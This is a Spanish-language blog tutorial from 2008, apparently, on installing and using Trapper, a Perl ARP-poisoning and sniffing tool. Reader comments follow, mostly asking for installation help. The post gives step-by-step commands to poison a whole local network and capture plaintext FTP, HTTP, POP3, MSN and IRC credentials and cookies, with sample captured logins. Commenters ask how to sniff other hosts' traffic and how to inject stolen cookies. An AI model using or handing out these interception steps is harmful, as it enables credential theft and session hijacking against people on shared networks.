Tutorial de Trapper
- Wednesday 16 de January, 2008 @ 15:35
- Escribir comentario
Trapper 0.3.3
Bueno estos chicos trabajan rapido Y acaban de sacar otra version de trapper
Cosas nuevas:
- Dirección MAC falsa (00:11:22:33:44:55 o aleatoria)
- Trapper.conf (para especificar parametros que se deseen sniffear via http, similar a la funcionalidad de Cain; además también se puede especificar los puertos que se deseen sniffear)
- IRC chat sniffing
Bugs arreglados:
- Detección de la dirección IP local
- Información duplicada en el HTTP sniffing
- Install.pl, algunos módulos faltantes
Lo pueden descargar de aquí.
http://nediam.com.mx/trapper/trapper-0.3.3.tar.gz</a></div>
Bueno les habia prometido un tutorial de uso de esta herramienta.
y Aqui vamos
tar -zxvf trapper-0.3.3.tar.gz
cd trapper-0.3.3/
Instala manualmente Net::Pcap de search.cpan.org y luego
perl install.pl
Esperamos a que se instalen los Modulos de perl
Ahora
#perl trapper.pl
--trapper ver. 0.3.3--
--Sniffer and ARP Poisoning Routing program--
Usage: trapper -i <interface> -m <mode> [-v msn,cookiem,irc] [-f fake_mac || random ]
Mode: sniff | apr
Example: trapper -i eth0 -m apr -f 00:02:5C:17:2B:FA
Si notan existen 2 modos el modo sniff y apr
Para poder sniffear toda la red tendremos que lanzar un ataque apr(arp).
de la siguiente forma.
Deberia llevar -f y la fakemac pero en algunas distros causa un problema asi que por ahora
no la pondremos.
#perl trapper.pl -i eth1 -m apr
-------------------------------------------------------------------</div>
trapper ver. 0.3.2
Authors: crypkey, nediam, nahual
[*] MODE SELECTED: ARP POISON ROUTING
[*] Specify the range to scan (ex. 192.168.1.0 - 192.168.1.254 )
Range: 192.168.1.0 - 192.168.1.254
Aqui especificaremos el rango de ips que queremos sniffear Podria ser toda la red local.
[*] Scanning range from 192.168.1.0 to 192.168.1.254…
[*] Skipping our host (IP attacker): 192.168.1.118
IP: 192.168.1.1 MAC: 00:0f:66:da:ab:89
IP: 192.168.1.100 MAC: 00:14:51:82:de:97
[*] Hosts found: 2
[*] Select Option:
[*] 1) One-to-One: Hijack the traffic only between two particular hosts
[*] 2) One-to-All: Hijack the network faking a single host (The default gateway is a good option)
[*] 3) Hijack the entire network
Ahora que tipo de ataque realizaremos , el mas bonito es el 3 . para que esniffe todo el tradico
de las maquinas que se encuentran dentro de la red local.
Type of attack: 3
[*] Infecting Host(s)…
[*] Leaving arp-poison into background: pid 6340 …
[*] Sniffing using Dev :eth1:
..Bueno y Ahora que ?
Si hay trafico empezaran a salir contraseñas en texto plano
Por default snifea los protocolos
1. HTTP (Cookie supported)
2. FTP
3. TELNET
4. POP3
5. IMAP
6. SMTP
7. MSN
8. IRC (Convos supported)
9. SMB
Que es lo mismo que seleccionaramos esta opcion
##perl trapper.pl -i eth1 -m sniff
-------------------------------------------------------------------</div>
trapper ver. 0.3.2
Authors: crypkey, nediam, nahual
[*] MODE SELECT: SNIFFER
[*] Supported protocols:
1. HTTP (Cookie supported)
2. FTP
3. TELNET
4. POP3
5. IMAP
6. SMTP
7. MSN
8. IRC (Convos supported)
9. SMB
10. All
Pues de una vez todo no? mas vale que sobre y no que falte.
Select option(s) [default: 10]: 10
[*] Sniffing using Dev :eth1:
[*] Filter :tcp and port 21 or port 23 or port 25 or port 80 or port 143 or port 110 or port 1863 or port 6667 or port 445:
MSG: VERSION
192.168.1.118:46374 --> 74.52.74.204:21 (FTP)
User: test
Pass: test
192.168.1.118:48698 --> 204.13.51.242:80 (HTTP)
Host: hi5.com
User/Pass: email=test@unixmexico.org&password=test&remember=on
192.168.1.118:48701 --> 204.13.51.242:80 (HTTP)
Host: hi5.com
User/Pass: status=1:1:1&fromInterstitial=true&circle=17851952&status-0=1&userid=144997706&circle=17851952&status-1=1&userid=6619911&circle=17851952&status-2=1&userid=9180542</div> </span>
Bueno que les parece?
para el irc crea un directorio donde guarda las conversaciones tanto privadas como de algun canal.
para el msn igual crea un directorio por cada conversacion que se tienen el messenger.
para pop3/ftp crea un arhicvo llamado ftp-pop3.txt
Dudas, Comentarios?
Happy Hacking Guys
{
al intentar instalar Net-Pcap me arroja esto, podrias ayudarmeee ??????
: debian:/home/edkepex/Desktop/TRAPPER/Net-Pcap-0.16# ls
bin eg Makefile.PL META.yml Pcap.xs README t
Changes fallback MANIFEST Pcap.pm ppport.h stubs.inc typemap
debian:/home/edkepex/Desktop/TRAPPER/Net-Pcap-0.16# perl Makefile.PL
looking for -lpcap… no
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
You appear to lack the pcap(3) library.
If it is installed in a non-standard location, please try setting the LIBS
and INC values on the command line.
Or get the sources and install the pcap library from http://www.tcpdump.org/
If you install the pcap library using a system package, make sure to also
install the corresponding -devel package, which contains the C headers needed
to compile this module.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Que version de trapper estas usando?
ya recorde que distro de linux estas usando?
Estoy usando trapper 0.4 [2008-07-23]
y tengo debian Lenny
Ok probaré con lo que tu me dices , gracias !
si tienes debian lenny
La instale la librerias que mencionas pero no entiendo que onda con : instalar net-cap usando cpan
me sigue apareciendo lo mismo que t puse arriba
mira…
debian:/home/edkepex/Desktop# apt-get install libcap-bin
Leyendo lista de paquetes… Hecho
Creando árbol de dependencias
Leyendo la información de estado… Hecho
libcap-bin ya está en su versión más reciente.
0 actualizados, 0 se instalarán, 0 para eliminar y 134 no actualizados.
debian:/home/edkepex/Desktop# apt-get install libcap-dev
Leyendo lista de paquetes… Hecho
Creando árbol de dependencias
Leyendo la información de estado… Hecho
libcap-dev ya está en su versión más reciente.
0 actualizados, 0 se instalarán, 0 para eliminar y 134 no actualizados.
intento instalar net-cap
debian:/home/edkepex/Desktop/Net-Pcap-0.16# ls
bin Changes eg fallback Makefile.PL MANIFEST META.yml Pcap.pm Pcap.xs ppport.h README stubs.inc t typemap
debian:/home/edkepex/Desktop/Net-Pcap-0.16# perl Makefile.PL
looking for -lpcap… no
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
You appear to lack the pcap(3) library.
If it is installed in a non-standard location, please try setting the LIBS
and INC values on the command line.
Or get the sources and install the pcap library from http://www.tcpdump.org/
If you install the pcap library using a system package, make sure to also
install the corresponding -devel package, which contains the C headers needed
to compile this module.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Espero que me puedas ayudar y agradezco tu atencion y tu tiempo…
Por cierto de que pais eres
De antemano gracias !!
jajaja no queria poner ese carita,
queria poner signos de interrogacion ? ?
gracias !!
Instala esta version
Cancun Mexico
hola, ya tengo el trapper 0.4.1 corriendo, el problema es que nada mas me sniffea lo que hace mi computadora, no me da acceso a lo que hacen las demas.. que estara pasando? este es el comando de ejecucion:
perl trapper.pl -i eth2 -m sniff -v msn
y veo mis conversaciones, mis cookies, etc.. pero no veo lo que hacen las demas computadoras en mi red.
de antemano, gracias..
perl trapper.pl -i eth2 -m apr
Y ahi te pedira el rango de ip ya sea que la detecte automaticamente (por lo general los que administran las redes pone servidores DHCP
Y luego
perl trapper.pl -i eth2 -m sniff
una pregunta… supuestamente trae para hacer injeccion de las cockies con firefox 3.. pero no veo por donde no discuten ese tema?? como se hace?
Hola Roa, hace algunos meses tuve la fortuna de estar en una conferencia del Nahual uno de los creadores de Trapper, fue genial verlo en accion y de hecho al final platique con el sobre so proyecto, me resulto muy interesante, ahora que lo pruebo tengo un pequeño problema, todo se instala bien, estoy usando la versión 4.1 y la 4 y en ambas no me detecta ningun host a la hora de hacer el apr, y en modo sniffer no detecta hosts, solo lo que pasa por mi computadora, estoy usando la interfaz ath0(una atheros), me gustaria que me aconsejaras que hacer para poderlo hacer funcionar… Gracias
Checa ponieno de modo manual tu segmento de red cuando hace el scan de toda la red.
Es exacto lo que yo he hecho, pongo el rango de ip manualmente, me he instalado en virtualbox ubuntu para probarlo desde ahi y ocurre lo mismo, solo me detecta la ip de la maquina virtual y la ip de mi maquina normal, cuando salga el nuevo ubuntu quitare el slack y me pasare a ubuntu, haber q sucede, por cierto soy de cancun, creo q ustedes igual, haber cuando vamos por las chelas jejej, saludos!
Entre maquinas virtuales dependera de la configuracion que tengas .
Hola acabo de probar la versión del trapper 0.4.1 y 0.4.0 con ubuntu karmic… y solo detecta un host, el de la máquina, he visto que hay gente que tiene el mismo problema, he probado a ponerlo manual, cambiar el segmento de la red… pero no hay manera, alguna idea¿? gracias
saludos
hermano gracias por este tuto me sirvio mucho, tengo una pregunta, como puedo ver la info encriptada de la cookie ke capturo?
Muy bueno! Tome los comentarios primeros ya que fueron de utilidad. Sdos,Javi
Excelente como dije anteriormente
una pregunta… supuestamente trae para hacer injeccion de las cockies con firefox 3.. pero no veo por donde no discuten ese tema?? como se hace?
Torrents